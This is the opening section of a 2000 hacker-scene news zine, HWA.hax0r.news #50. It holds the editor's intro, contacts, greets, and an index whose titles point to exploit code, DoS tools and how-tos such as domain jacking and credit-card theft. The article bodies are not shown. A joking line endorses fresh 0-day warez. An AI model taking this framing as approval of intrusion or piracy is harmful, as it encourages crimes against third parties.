[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA 2000=] Number 50 Volume 2 Issue 2 1999 Feb 2000 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== = "ABUSUS NON TOLLIT USUM" = ========================================================================== Editor: Cruciphux (cruciphux@dok.org) A Hackers Without Attitudes Production. (c) 1999, 2000 http://welcome.to/HWA.hax0r.news/ ========================================================================== ____ / ___|_____ _____ _ __ __ _ __ _ ___ | | / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \ | |__| (_) \ V / __/ | | (_| | (_| | __/ \____\___/ \_/ \___|_| \__,_|\__, |\___| |___/ This is #50 covering Jan 16th to Feb 13th, 2000 ========================================================================== "Taking a fat cross section of the underground and security scene today and laying it your lap for tomorrow." ========================================================================== __ __ _ _____ _ _ _ ___ \ \ / /_ _ _ __ | |_|_ _|__ | | | | ___| |_ __|__ \ \ \ /\ / / _` | '_ \| __| | |/ _ \| |_| |/ _ \ | '_ \ / / \ V V / (_| | | | | |_ | | (_) | _ | __/ | |_) |_| \_/\_/ \__,_|_| |_|\__| |_|\___/|_| |_|\___|_| .__/(_) |_| How Can I Help ?? ~~~~~~~~~~~~~~~~~ I'm looking for staff members to help with putting the zine together if you want your name in lights (ie: mad propz and credz in here) and have the time to spare, then here are some of the areas I can use help in: The Big One: ~~~~~~~~~~~ Text to HTML project: This entails converting all existing texts to HTML and including, were appropriate the hyperlinks for urls mentioned in text. Foreign Correspondants and Translators ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I'm also looking for people willing to translate articles from their area (usually Dutch, German, Norwegian etc) to contribute articles and if possible translate them into english for us. You will be marked as HWA staff on our list, please include your email and website info, and bio if you wish to do so, none of this is required however. Your help is appreciated! Site Design ~~~~~~~~~~~ I need some design ideas for the website, i've temporarily revamped it but i'd like to test some new look and feel ideas, if you're a web wizard and want to try your hand at making us a site, email me, and go for it, be warned that we may NOT use your design, but don't let that stop you from trying your hand at it. An online temp/demo site would be helpful. News Collection: ~~~~~~~~~~~~~~~ There are a LOT of sources and resources, many listed here and others in the ether, search these or pick a few of these sources to search for stories of interest and email them to me. Scan for hacked, hacking cracked, cracking, defacement, DoS attack, Cyber cyberwar, etc as an example. CGI and PERL script programming ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I'd like to make the zine contents searchable by keyword/issue online and also display the indexes of online copies of the newsletter. If you have any ideas for this let me know, I could do it myself but If you already have a project laying around that would do for this then why reeinvent the wheel? Also; data grabbers that will snag the news from sites like HNN and strip the HTML off and email the raw news data, etc, headline collectors for security-focus and packetstorm etc are all also good ideas. Theres more of course, if you have something you'd like to contribute let me know and i'll find something for you to do. Thanks for listening cruciphux@dok.org =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ # # @ The HWA website is sponsored by CUBESOFT communications I highly @ # recommend you consider these people for your web hosting needs, # @ @ # Web site sponsored by CUBESOFT networks http://www.csoft.net # @ check them out for great fast web hosting! @ # # # http://www.csoft.net/~hwa @ @ # @#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ____ _ / ___| _ _ _ __ ___ _ __ ___(_)___ \___ \| | | | '_ \ / _ \| '_ \/ __| / __| ___) | |_| | | | | (_) | |_) \__ \ \__ \ |____/ \__, |_| |_|\___/| .__/|___/_|___/ |___/ |_| SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... =-----------------------------------------------------------------------= "If live is a waste of time and time is a waste of life, then lets all get wasted and have the time of our lives" - kf ____| _| | __| | __ \ _ \ __| | __| | | __/ | _____|_| _| _|\___|\__| Catch us on Internet Relay Chat, Eris Free Net... /join #HWA.hax0r.news ************************************************************************** *** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed *** *** *** *** please join to discuss or impart news on the zine and around the *** *** scene or just to hang out, we get some interesting visitors you *** *** could be one of em. *** *** *** *** Note that the channel isn't there to entertain you its purpose is *** *** to bring together people interested and involved in the underground*** *** to chat about current and recent events etc, do drop in to talk or *** *** hangout. Also if you want to promo your site or send in news tips *** *** its the place to be, just remember we're not #hack or #chatzone... *** ************************************************************************** =--------------------------------------------------------------------------= _____ _ _ / ____| | | | | | | ___ _ __ | |_ ___ _ __ | |_ ___ | | / _ \| '_ \| __/ _ \ '_ \| __/ __| | |___| (_) | | | | || __/ | | | |_\__ \ \_____\___/|_| |_|\__\___|_| |_|\__|___/ =--------------------------------------------------------------------------= [ INDEX ] HWA.hax0r.news #50 =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. LEGAL & COPYRIGHTS .............................................. 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. THIS IS WHO WE ARE .............................................. ABUSUS NON TOLLIT USUM? This is (in case you hadn't guessed) Latin, and loosely translated it means "Just because something is abused, it should not be taken away from those who use it properly). This is our new motto. =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= "The three most dangerous things in the world are a programmer with a soldering iron, a hardware type with a program patch and a user with an idea." - Unknown 01.0 .. GREETS ........................................................... 01.1 .. Last minute stuff, rumours, newsbytes ............................ 01.2 .. Mailbag .......................................................... 02.0 .. From the Editor................................................... 03.0 .. Slash, Croatian cracker, speaks out............................... 04.0 .. The hacker sex chart 2000 ........................................ 05.0 .. Peer finally arrested after over a decade of IRC terrorism........ 06.0 .. Updated proxies list from IRC4ALL................................. 07.0 .. Rant: Mitnick to go wireless?..................................... 08.0 .. Distrubuted Attacks on the rise. TFN and Trinoo. ................. 09.0 .. Teen charged with hacking, flees to Bulgaria, still gets busted... 10.0 .. Major security flaw in Microsoft (Say it ain't so!! haha)......... 11.0 .. Cerberus Information Security Advisory (CISADV000126)............. 12.0 .. "How I hacked Packetstorm Security" by Rainforest Puppy........... 13.0 .. stream.c exploit ................................................. 14.0 .. Spank, variation of the stream.c DoS.............................. 15.0 .. Canadian Security Conference announcement: CanSecWest............. 16.0 .. Security Portal Review Jan 16th................................... 17.0 .. Security Portal review Jan 24th................................... 18.0 .. Security Portal review Jan 31st................................... 19.0 .. CRYPTOGRAM Jan 15th............................................... 20.0 .. POPS.C qpop vulnerability scanner by Duro......................... 21.0 .. Hackunlimited special birthday free-cdrom offer................... 22.0 .. HACK MY SYSTEM! I DARE YA! (not a contest)........................ 23.0 .. PWA lead member busted by the FBI................................. 24.0 .. Mitnick's Release Statement....................................... 24.1 .. More submitted Mitnick articles................................... 25.0 .. Hackers vs Pedophiles, taking on a new approach................... 26.0 .. SCRAMDISK (Windows) on the fly encryption for your data........... 27.0 .. HNN:Jan 17: MPAA files more suits over DeCSS...................... 28.0 .. WARftpd Security Alert (Will they EVER fix this software??)....... 29.0 .. HNN: Jan 17th: Seven eCommerce Sites Found Vulnerable ............ 30.0 .. HNN:Jan 17: Scotland Yard Investigating Cyber Ransom Demands...... 31.0 .. HNN:Jan 17: Pay Phone Fraud Committed with Drinking Straw ........ 32.0 .. Owning sites that run WebSpeed web db software.................... 33.0 .. Cerberus Information Security Advisory (CISADV000202)............. 34.0 .. Seccurity Focus Newsletter #26.................................... 35.0 .. HNN: Jan 17: NY Student Arrested After Damaging School Computer... 36.0 .. HNN: Jan 17: NSA Wants A Secure Linux ............................ 37.0 .. HNN: Jan 17: Cryptome may be breaaking the law.................... 38.0 .. HNN: Jan 21: H4g1s Member Sentenced to Six Months ................ 39.0 .. HNN: Jan 21: Smurf Attack Felt Across the Country ................ 40.0 .. HNN: Jan 21: CIHost.com Leaves Customer Info On the Net .......... 41.0 .. HNN: Jan 21: False Bids Submitted, Hackers Blamed ................ 42.0 .. HNN: Jan 21: UK to create cyber force............................. 43.0 .. HNN: Jan 21: Army Holds Off Cyber Attack ......................... 44.0 .. HNN: Jan 24: French smart card expert goes to trial............... 45.0 .. HNN: Jan 24: Palm HotSync Manager is Vulnerable to DoS Attack .... 46.0 .. HNN: Jan 24: Viruses Cost the World $12.1 Billion ................ 47.0 .. HNN: Jan 24: L0pht and @Stake Create Controversy ($).............. 48.0 .. HNN: Jan 24: Several New Ezine Issues Available .................. 49.0 .. HNN: Jan 25: AIM Accounts Susceptible to Theft ................... 50.0 .. HNN: Jan 25: Outpost Leaks Customer Info ......................... 51.0 .. HNN: Jan 25: DeCSS Author Raided ................................. 52.0 .. HNN: Jan 25: Solaris May Go Free and Open ........................ 53.0 .. HNN: Jan 25: Documents Prove Echelon not a Journalist Fabrication. 54.0 .. HNN: Jan 25: Japan Needs US Help With Defacements ............... 55.0 .. HNN: Jan 25: Car Radios Monitored by Marketers ................... 56.0 .. HNN: Jan 26: DoubleClick Admits to Profiling of Surfers .......... 57.0 .. HNN: Jan 26: Support for DeCSS Author Grows ...................... 58.0 .. HNN: Jan 26: China To Require Crypto Registration ................ 59.0 .. HNN: Jan 26: NEC Develops Network Encryption Technology .......... 60.0 .. HNN: Jan 26: UPS announces Worldtalk secure email................. 61.0 .. HNN: Jan 27: Napster Reveals Users Info .......................... 62.0 .. Dissecting the Napster system..................................... 63.0 .. HNN: Jan 27: DVD Lawyers Shut Down Courthouse .................... 64.0 .. HNN: Jan 27: Yahoo May Be Violating Texas Anti-Stalking Law ...... 65.0 .. HNN: Jan 27: Data From Probes of Takedown.com .................... 66.0 .. HNN: Jan 27: Top Ten Viruses of 1999 ............................. 67.0 .. HNN: Jan 27: French Eavesdrop on British GSM Phones .............. 68.0 .. So wtf is the deal with l0pht and @stake? here'$ the FAQ jack..... 69.0 .. Anti-Offline releases majorly ereet 0-day script kiddie juarez!... 70.0 .. HNN: Jan 31: MS Issues Security Patch for Windows 2000 ........... 71.0 .. HNN: "Have script Will destroy" - a buffer overflow article....... 72.0 .. HNN: Cert Warning? : what me worry?? - buffer overflow article.... 73.0 .. HNN: The Japanese Panic Project - buffer overflow article......... 74.0 .. HNN: Jan 31 Bulgarian Indicted for Cyber Crime .................. 75.0 .. HNN: Jan 31: Online Banking Still Immature ....................... 76.0 .. HNN: Jan 31: E-Mail Scanning System In Progress .................. 77.0 .. HNN: Jan 31: USA Today Headlines Changed ......................... 78.0 .. HNN: Jan 31: @Stake and L0pht .................................... 79.0 .. HNN: Jan 31: Book Review: "Database Nation"....................... 80.0 .. HNN: Feb 1st: Interview with DeCSS Author ........................ 81.0 .. HNN: Feb 1st: X.com Denies Security Breach ....................... 82.0 .. HNN: Feb 1st: Microsoft Security, An Oxymoron? ................... 83.0 .. HNN: Feb 1st; Cringely, Defcon, E-Commerce and Crypto ............ 84.0 .. HNN: Feb 1st: Cold War Spies For Hire ............................ 85.0 .. HNN: Feb 1st: More Ezines Available .............................. 86.0 .. HHN: Feb 2nd: WorldWide Protest Against MPAA Planned ............. 87.0 .. HNN: Feb 2nd; DoubleClick Receiving Protests ..................... 88.0 .. HNN: Feb 2nd: More CC Numbers Found on Net ....................... 89.0 .. HNN: Feb 2nd: Clinton Cyber Security Plan Draws Fire ............. 90.0 .. HNN: Feb 2nd: AntiPiracy Campaign Increases Sales ................ 91.0 .. HNN: Feb 2nd: Web Aps, the New Playground ........................ 92.0 .. HNN: Feb 3rd: Malicious HTML Tags Embedded in Client Web Requests. 93.0 .. HNN: Feb 3rd: Curador Posts More CC Numbers ...................... 94.0 .. HNN: Feb 3rd: IETF Says No To Inet Wiretaps ...................... 95.0 .. HNN: Feb 3rd: Medical Web Sites Leak Privacy Info ................ 96.0 .. HNN: Feb 4th: 27 Months for Piracy ............................... 97.0 .. Have you been looking for www.hack.co.za?......................... 98.0 .. HNN: Feb 4th; Security Holes Allow Prices to be Changed .......... 99.0 .. ThE,h4x0r.Br0z toss us a dis ..................................... 100.0 .. HNN: Feb 4th: Carders Congregate in IRC .......................... 101.0 .. HNN: Feb 4th; Tempest Tutorial and Bug Scanning 101 .............. 102.0 .. HNN: Feb 7th; Mitnick to Give Live Interview .................... 103.0 .. HNN: Feb 7th; Anti MPAA Leafletting Campaign a Huge Success ...... 104.0 .. HNN: Feb 7th: Founding Member of PWA Busted ...................... 105.0 .. HNN: Feb 7th; Teenager Busted for Attempted Cyber Extortion of $500 ............................................... 106.0 .. HNN: Feb 7th: Japanese Plan to Fight Cyber Crime ................. 107.0 .. HNN: Feb 7th; Philippine President Web Site Defaced .............. 108.0 .. HNN: Feb 8th: Software Companies Seek to Alter Contract Law ...... 109.0 .. HNN: Feb 8th; Yahoo Taken Offline After Suspected DoS Attack ..... 110.0 .. HNN: Feb 8th; New Hack City Video ................................ 111.0 .. HNN: Feb 8th; Thailand E-commerce Site Stored Credit Cards on .... Mail Server......................................... 112.0 .. HNN: Feb 8th; Script Kiddie Training ............................. 113.0 .. HNN: Feb 8th; Personal CyberWars ................................. 114.0 .. HNN: Feb 8th; Space Rogue Profiled by Forbes ..................... 115.0 .. HNN: Feb 9th: Yahoo, Buy.com, Amazon, E-Bay, CNN, UUNet, Who's.... Next?............................................... 116.0 .. Trinoo Killer Source Code......................................... 117.0 .. Mixter's guide to defending against DDoS attacks.................. 118.0 .. HNN: Feb 9th; Court Authorizes Home Computer Search ............. 119.0 .. HNN: Feb 9th; MPAA Makes Deceptive Demands ...................... 120.0 .. HNN: Feb 9th; Medical Sites Give Out Info ....................... 121.0 .. HNN: Feb 9th; FTC Investigates Amazon Subsidiary on use of....... Customer Info ..................................... 122.0 .. HNN: Feb 9th; Sys Admins Possibly At Fault in Japanese .......... Defacements ....................................... 123.0 .. HNN: Feb 9th; Anonymity and Tracking of the Malicious Intruder... 124.0 .. HNN; Feb 10th; E-Trade, LA Times, Datek, ZD-Net Join List of...... Sites ............................................. 125.0 .. HNN: Feb 10th; NIPC Releases Detection Tools .................... 126.0 .. HNN: Feb 10th; The Underground Reaction .......................... 127.0 .. HNN: Feb 10th; Haiku Worm Now on the Loose ....................... 128.0 .. HNN: Feb 11th; Investigations Continue, Reports of more Possible.. Attacks Surface ................................... 129.0 .. HNN: Feb 11th;Author of Tool Used in Attacks Speaks ............. 130.0 .. HNN: Feb 11th;NIPC Reissues Alert on DDoS ....................... 131.0 .. HNN: Feb 11th; Lawmakers Succumb to Kneejerk Reaction .......... 132.0 .. HNN: Feb 11th; Humor in the Face of Chaos ....................... 133.0 .. HNN: Feb 11th; Britain Passes Despotic Laws ..................... 134.0 .. HHN: Feb 11th; France Sues US and UK over Echelon .............. 135.0 .. HNN; Feb 11th; Mellissa Virus Comes Back ........................ 136.0 .. HWA: aKt0r's story by wyzewun.................................... 137.0 .. ISN: Jan 16:Hacker gang blackmails firms with stolen files....... 138.0 .. How to steal 2,500 credit cards.................................. 139.0 .. Good IDS article from Security Portal............................ 140.0 .. Win2000 security hole a 'major threat'........................... 141.0 .. New hack attack is greater threat than imagined.................. 142.0 .. NSA gets bitten in the ass too................................... 143.0 .. rzsz package calls home if you don't register the software....... 144.0 .. Clinton calls Internet Summit on the DDoS threat................. 145.0 .. ISN: Who gets your trust?........................................ 146.0 .. ISN: Hackers demand 10 Million pounds from Visa.................. 147.0 .. ISN: Cybercrime growing harder to prosecute...................... 148.0 .. ISN: Hacking Exposed (Book review) By Brian Martin............... 149.0 .. ISN: The crime of punishment by Brian Martin..................... 150.0 .. ISN: EDI Security, Control and,Audit(Book review)by Brian Martin. 151.0 .. ISN: "Remember, some 'hackers' make house calls" ie:burglary..... 152.0 .. ISN Japanese Police crack down on hacker attacks................. 153.0 .. ISN:Behind the scenes at "Hackers Inc.".......................... 154.0 .. ISN: Hackers a No-Show at DVD decryption protest (!???).......... 155.0 .. ISN: need C2 security? - stick with NT 4.0 by Susan Menke........ 156.0 .. ISN: Sites cracked with id's and passwords....................... 157.0 .. ISN: Who are these jerks anyway?................................. 158.0 .. Hellvisory #001 - Domain Name Jacking HOW-TO by Lucifer.......... 159.0 .. SSHD Buffer overflow exploit (FreeBSD)........................... 160.0 .. Mozilla curiosity................................................ 161.0 .. Any user can make hard links in Unix............................. 162.0 .. Crash windows boxes on local net (twinge.c)...................... 163.0 .. SpiderMap 0.1 Released........................................... 164.0 .. Windows Api SHGetPathFromIDList Buffer Overflow.................. 165.0 .. Anywhere Mail Server Ver.3.1.3 Remote DoS........................ 166.0 .. .ASP error shows full source code to caller...................... 167.0 .. Bypassing authentication on Axis 700 Network Scanner............. 168.0 .. Novell Bordermanager 3.0 through 3.5 is vulnerable to a slow DoS. 169.0 .. CERN 3.0A Heap overflow advisory................................. 170.0 .. Cfingerd 1.3.3 (*BSD) remote root buffer overflow exploit........ 171.0 .. FreeBSD 3.4-STABLE /usr/bin/doscmd local exploit................. 172.0 .. FireWall-1 FTP Server Vulnerability Background Paper #1.......... 173.0 .. Fool firewalls into opening ports with PASV...................... 174.0 .. InetServ 3.0 remote DoS exploit.................................. 175.0 .. ppp 1.6.14 shows local user the saved PPP password............... 176.0 .. Another screw up in MS's Java Virtual Machine, breaks security... 177.0 .. mySQL password checking routines insecure........................ 178.0 .. Guninski: Outlook and Active Scripting (again, sigh...).......... 179.0 .. Break a BeOS poorman server remotely with url infusion........... 180.0 .. Proftpd (<= pre6) linux ppc remote exploit....................... 181.0 .. Insecure defaults in SCO openserver 5.0.5 leaves the doors open. 182.0 .. Malformed link in SERVU then a list = instant DoS (crash!)....... 183.0 .. FreeBSD 3.3-RELEASE /sbin/umount local exploit................... 184.0 .. Yet another War-ftpd vulnerabilty (why do ppl use this?)......... 185.0 .. Z0rk a Zeus Web Server DoS....................................... 186.0 .. Following up on the DDOS attacks of the past week (various)...... 187.0 .. InetServ 3.0 - Windows NT - Remote Root Exploit.................. 188.0 .. Bugfest! Win2000 has 63,000 'defects'............................ 189.0 .. Legit Hackers Roam Cyberspace for Security....................... 190.0 .. Deutch controversy raises security questions for Internet users.. 191.0 .. PC's Vulnerable to Security Breaches, Experts Say................ 192.0 .. Hacking hazards come with Web scripting territory ............... 193.0 .. Microsoft battles pair of security bugs ......................... 194.0 .. Ex-CIA chief surfed Web on home computer with top-secret data.... 195.0 .. How Safe Is AOL 5.0?............................................. 196.0 .. Teens steal thousands of net accounts............................ 197.0 .. Online Credit Hacker May Be Out For Profit....................... =-------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in.ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Ha.Ha .. Humour and puzzles ............................................ Oi! laddie! send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... * COMMON TROJAN PORTS LISTING..................................... A.1 .. PHACVW linx and references...................................... A.2 .. Hot Hits (.gov and .mil + other interesting traffic on our site) A.3 ,, Mirror Sites list............................................... A.4 .. The Hacker's Ethic 90's Style.................................. A.5 .. Sources........................................................ A.6 .. Resources...................................................... A.7 .. Submission information......................................... A.8 .. Mailing lists information...................................... A.9 .. Whats in a name? why HWA.hax0r.news??.......................... A,10 .. HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again). A.11 .. Underground and (security?) Zines.............................. * Feb 2000 moved opening data to appendices, A.2 through A.10, probably more to be added. Quicker to get to the news, and info etc... - Ed =--------------------------------------------------------------------------= @HWA'99, 2000 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ | | ___ __ _ __ _| | | | / _ \/ _` |/ _` | | | |__| __/ (_| | (_| | | |_____\___|\__, |\__,_|_| |___/ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD ** USE NO HOOKS ** Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. HWA (Hackers Without Attitudes) is not affiliated with HWA (Hewlitts Warez Archive?), and does not condone 'warez' in any shape manner or form, unless they're good, fresh 0-day and on a fast site. cruciphux@dok.org Cruciphux [C*:.] HWA/DoK Since 1989 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ _ / ___|___ _ __ | |_ __ _ ___| |_ ___ | | / _ \| '_ \| __/ _` |/ __| __/ __| | |__| (_) | | | | || (_| | (__| |_\__ \ \____\___/|_| |_|\__\__,_|\___|\__|___/ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you ~~~~~~~ are reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas2@usa.net Other methods: Cruciphux's ICQ:58939315 note; not always online, and do not abuse or use for lame questions! My Preffered chat method: IRC Efnet in #HWA.hax0r.news @HWA 00.2 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ __ ___ ___ \ \ / / |__ ___ __ _ _ __ _____ ____|__ \ \ \ /\ / /| '_ \ / _ \ / _` | '__/ _ \ \ /\ / / _ \/ / \ V V / | | | | (_) | (_| | | | __/\ V V / __/_| \_/\_/ |_| |_|\___/ \__,_|_| \___| \_/\_/ \___(_) Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/programming/IRC+ man in black sas2@usa.net .............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black twisted-pair@home.com......: currently active/programming/IRC+ Foreign Correspondants/affiliate members (Active) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media Zym0t1c ..........................: Dutch/Germany/Europe Sla5h.............................: Croatia Spikeman .........................: World Media/IRC channel enforcer HWA members ......................: World Media Armour (armour@halcon.com.au).....: Australia Wyze1.............................: South Africa Past Foreign Correspondants (currently inactive or presumed dead) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) Sla5h's email: smuddo@yahoo.com ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas 99 issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ / ___|_ __ ___ ___| |_ ___ | | _| '__/ _ \/ _ \ __/ __| | |_| | | | __/ __/ |_\__ \ \____|_| \___|\___|\__|___/ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi _Jeezus_ Haze_ thedeuce ytcracker loophole BlkOps vetesgirl Slash bob- CHEVY* Dragos Ruiu pr0xy Folks from #hwa.hax0r,news and other leet secret channels, *grin* - mad props! ... ;-) Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick (free at last) Kevin is due to be released from federal prison on January 21st 2000 for more information on his story visit http://www.freekevin.com/ kewl sites: + http://blkops.venomous.net/ NEW + http://www.hack.co.za NEW -> ** Due to excessive network attacks this site is now being mirrored at http://www.siliconinc.net/hack/ + http://blacksun.box.sk. NEW + http://packetstorm.securify.com/ NEW + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ ____ _ | \ | | _____ _____| __ ) _ _| |_ ___ ___ | \| |/ _ \ \ /\ / / __| _ \| | | | __/ _ Y __| | |\ | __/\ V V /\__ \ |_) | |_| | || __|__ \ |_| \_|\___| \_/\_/ |___/____/ \__, |\__\___|___/ |___/ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 Since we provide only the links in this section, be prepared for 404's - Ed +++ When was the last time you backed up your important data? s ++ Phony Tragedy Site Has Virus Contributed by Slash Alaska Airlines warns that a Web site seeking donations for victims of Flight 261 is a phony and that it is carrying a virus. Full Story ++ Tough U.S. Bank Privacy Regs Contributed by Slash U.S. regulators took a tough line Thursday on privacy protection for personal financial information included in a historic overhaul of Depression-era U.S. banking laws 